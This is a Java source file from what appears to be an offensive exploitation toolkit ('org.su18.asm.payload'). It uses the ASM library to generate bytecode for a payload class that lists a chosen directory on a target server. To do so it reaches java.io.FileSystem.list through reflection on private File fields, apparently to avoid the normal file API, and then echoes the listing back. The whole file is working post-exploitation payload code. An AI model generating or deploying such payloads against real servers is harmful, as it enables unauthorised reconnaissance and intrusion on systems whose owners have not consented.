package org.su18.asm.payload;

import org.objectweb.asm.Label;
import org.objectweb.asm.MethodVisitor;
import org.objectweb.asm.Opcodes;
import org.objectweb.asm.Type;
import org.su18.utils.StringUtil;

public class DirList implements Opcodes {

	public static void insert(String className, MethodVisitor mv) {
		Label label0 = new Label();
		Label label1 = new Label();
		Label label2 = new Label();
		mv.visitTryCatchBlock(label0, label1, label2, "java/lang/Exception");
		Label label3 = new Label();
		mv.visitLabel(label3);
		mv.visitVarInsn(ALOAD, 0);
		mv.visitMethodInsn(INVOKESPECIAL, "java/lang/Object", "<init>", "()V", false);
		mv.visitLabel(label0);
		mv.visitLdcInsn(StringUtil.getCurrentPropertiesValue("list.dir"));
		mv.visitVarInsn(ASTORE, 1);
		Label label4 = new Label();
		mv.visitLabel(label4);
		mv.visitTypeInsn(NEW, "java/io/File");
		mv.visitInsn(DUP);
		mv.visitVarInsn(ALOAD, 1);
		mv.visitMethodInsn(INVOKESPECIAL, "java/io/File", "<init>", "(Ljava/lang/String;)V", false);
		mv.visitVarInsn(ASTORE, 2);
		Label label5 = new Label();
		mv.visitLabel(label5);
		mv.visitVarInsn(ALOAD, 2);
		mv.visitMethodInsn(INVOKEVIRTUAL, "java/io/File", "isFile", "()Z", false);
		Label label6 = new Label();
		mv.visitJumpInsn(IFEQ, label6);
		Label label7 = new Label();
		mv.visitLabel(label7);
		mv.visitVarInsn(ALOAD, 2);
		mv.visitMethodInsn(INVOKEVIRTUAL, "java/io/File", "getParentFile", "()Ljava/io/File;", false);
		mv.visitVarInsn(ASTORE, 2);
		mv.visitLabel(label6);
		mv.visitFrame(Opcodes.F_FULL, 3, new Object[]{className, "java/lang/String", "java/io/File"}, 0, new Object[]{});
		mv.visitLdcInsn("java.io.File");
		mv.visitMethodInsn(INVOKESTATIC, "java/lang/Class", "forName", "(Ljava/lang/String;)Ljava/lang/Class;", false);
		mv.visitVarInsn(ASTORE, 3);
		Label label8 = new Label();
		mv.visitLabel(label8);
		mv.visitVarInsn(ALOAD, 3);
		mv.visitLdcInsn("fs");
		mv.visitMethodInsn(INVOKEVIRTUAL, "java/lang/Class", "getDeclaredField", "(Ljava/lang/String;)Ljava/lang/reflect/Field;", false);
		mv.visitVarInsn(ASTORE, 4);
		Label label9 = new Label();
		mv.visitLabel(label9);
		mv.visitVarInsn(ALOAD, 4);
		mv.visitInsn(ICONST_1);
		mv.visitMethodInsn(INVOKEVIRTUAL, "java/lang/reflect/Field", "setAccessible", "(Z)V", false);
		Label label10 = new Label();
		mv.visitLabel(label10);
		mv.visitVarInsn(ALOAD, 3);
		mv.visitLdcInsn("prefixLength");
		mv.visitMethodInsn(INVOKEVIRTUAL, "java/lang/Class", "getDeclaredField", "(Ljava/lang/String;)Ljava/lang/reflect/Field;", false);
		mv.visitVarInsn(ASTORE, 5);
		Label label11 = new Label();
		mv.visitLabel(label11);
		mv.visitVarInsn(ALOAD, 5);
		mv.visitInsn(ICONST_1);
		mv.visitMethodInsn(INVOKEVIRTUAL, "java/lang/reflect/Field", "setAccessible", "(Z)V", false);
		Label label12 = new Label();
		mv.visitLabel(label12);
		mv.visitVarInsn(ALOAD, 5);
		mv.visitVarInsn(ALOAD, 2);
		mv.visitVarInsn(ALOAD, 1);
		mv.visitInsn(ICONST_0);
		mv.visitMethodInsn(INVOKEVIRTUAL, "java/lang/String", "charAt", "(I)C", false);
		mv.visitIntInsn(BIPUSH, 47);
		Label label13 = new Label();
		mv.visitJumpInsn(IF_ICMPNE, label13);
		mv.visitInsn(ICONST_1);
		Label label14 = new Label();
		mv.visitJumpInsn(GOTO, label14);
		mv.visitLabel(label13);
		mv.visitFrame(Opcodes.F_FULL, 6, new Object[]{className, "java/lang/String", "java/io/File", "java/lang/Class", "java/lang/reflect/Field", "java/lang/reflect/Field"}, 2, new Object[]{"java/lang/reflect/Field", "java/io/File"});
		mv.visitInsn(ICONST_0);
		mv.visitLabel(label14);
		mv.visitFrame(Opcodes.F_FULL, 6, new Object[]{className, "java/lang/String", "java/io/File", "java/lang/Class", "java/lang/reflect/Field", "java/lang/reflect/Field"}, 3, new Object[]{"java/lang/reflect/Field", "java/io/File", Opcodes.INTEGER});
		mv.visitMethodInsn(INVOKEVIRTUAL, "java/lang/reflect/Field", "setInt", "(Ljava/lang/Object;I)V", false);
		Label label15 = new Label();
		mv.visitLabel(label15);
		mv.visitLdcInsn("java.io.FileSystem");
		mv.visitMethodInsn(INVOKESTATIC, "java/lang/Class", "forName", "(Ljava/lang/String;)Ljava/lang/Class;", false);
		mv.visitVarInsn(ASTORE, 6);
		Label label16 = new Label();
		mv.visitLabel(label16);
		mv.visitVarInsn(ALOAD, 6);
		mv.visitLdcInsn("list");
		mv.visitInsn(ICONST_1);
		mv.visitTypeInsn(ANEWARRAY, "java/lang/Class");
		mv.visitInsn(DUP);
		mv.visitInsn(ICONST_0);
		mv.visitLdcInsn(Type.getType("Ljava/io/File;"));
		mv.visitInsn(AASTORE);
		mv.visitMethodInsn(INVOKEVIRTUAL, "java/lang/Class", "getDeclaredMethod", "(Ljava/lang/String;[Ljava/lang/Class;)Ljava/lang/reflect/Method;", false);
		mv.visitVarInsn(ASTORE, 7);
		Label label17 = new Label();
		mv.visitLabel(label17);
		mv.visitVarInsn(ALOAD, 7);
		mv.visitInsn(ICONST_1);
		mv.visitMethodInsn(INVOKEVIRTUAL, "java/lang/reflect/Method", "setAccessible", "(Z)V", false);
		Label label18 = new Label();
		mv.visitLabel(label18);
		mv.visitVarInsn(ALOAD, 7);
		mv.visitVarInsn(ALOAD, 4);
		mv.visitVarInsn(ALOAD, 2);
		mv.visitMethodInsn(INVOKEVIRTUAL, "java/lang/reflect/Field", "get", "(Ljava/lang/Object;)Ljava/lang/Object;", false);
		mv.visitInsn(ICONST_1);
		mv.visitTypeInsn(ANEWARRAY, "java/lang/Object");
		mv.visitInsn(DUP);
		mv.visitInsn(ICONST_0);
		mv.visitVarInsn(ALOAD, 2);
		mv.visitInsn(AASTORE);
		mv.visitMethodInsn(INVOKEVIRTUAL, "java/lang/reflect/Method", "invoke", "(Ljava/lang/Object;[Ljava/lang/Object;)Ljava/lang/Object;", false);
		mv.visitTypeInsn(CHECKCAST, "[Ljava/lang/String;");
		mv.visitTypeInsn(CHECKCAST, "[Ljava/lang/String;");
		mv.visitVarInsn(ASTORE, 8);
		Label label19 = new Label();
		mv.visitLabel(label19);
		mv.visitVarInsn(ALOAD, 0);
		mv.visitVarInsn(ALOAD, 8);
		mv.visitMethodInsn(INVOKESTATIC, "java/util/Arrays", "toString", "([Ljava/lang/Object;)Ljava/lang/String;", false);
		mv.visitFieldInsn(PUTFIELD, className, "result", "Ljava/lang/String;");
		mv.visitLabel(label1);
		Label label20 = new Label();
		mv.visitJumpInsn(GOTO, label20);
		mv.visitLabel(label2);
		mv.visitFrame(Opcodes.F_FULL, 1, new Object[]{className}, 1, new Object[]{"java/lang/Exception"});
		mv.visitVarInsn(ASTORE, 1);
		Label label21 = new Label();
		mv.visitLabel(label21);
		mv.visitVarInsn(ALOAD, 0);
		mv.visitLdcInsn("\u6267\u884c\u8fc7\u7a0b\u51fa\u9519\uff0c\u52a8\u4f5c\u53ef\u80fd\u6267\u884c\u5931\u8d25\uff01");
		mv.visitFieldInsn(PUTFIELD, className, "result", "Ljava/lang/String;");
		mv.visitLabel(label20);
		mv.visitFrame(Opcodes.F_SAME, 0, null, 0, null);
		mv.visitVarInsn(ALOAD, 0);
		mv.visitMethodInsn(INVOKEVIRTUAL, className, "echo", "()V", false);
		Label label22 = new Label();
		mv.visitLabel(label22);
		mv.visitInsn(RETURN);
		Label label23 = new Label();
		mv.visitLabel(label23);
		mv.visitLocalVariable("path", "Ljava/lang/String;", null, label4, label1, 1);
		mv.visitLocalVariable("file", "Ljava/io/File;", null, label5, label1, 2);
		mv.visitLocalVariable("f", "Ljava/lang/Class;", "Ljava/lang/Class<*>;", label8, label1, 3);
		mv.visitLocalVariable("field", "Ljava/lang/reflect/Field;", null, label9, label1, 4);
		mv.visitLocalVariable("field2", "Ljava/lang/reflect/Field;", null, label11, label1, 5);
		mv.visitLocalVariable("fs", "Ljava/lang/Class;", "Ljava/lang/Class<*>;", label16, label1, 6);
		mv.visitLocalVariable("m", "Ljava/lang/reflect/Method;", null, label17, label1, 7);
		mv.visitLocalVariable("result", "[Ljava/lang/String;", null, label19, label1, 8);
		mv.visitLocalVariable("ignored", "Ljava/lang/Exception;", null, label21, label20, 1);
		mv.visitLocalVariable("this", "L" + className + ";", null, label3, label23, 0);

	}

}
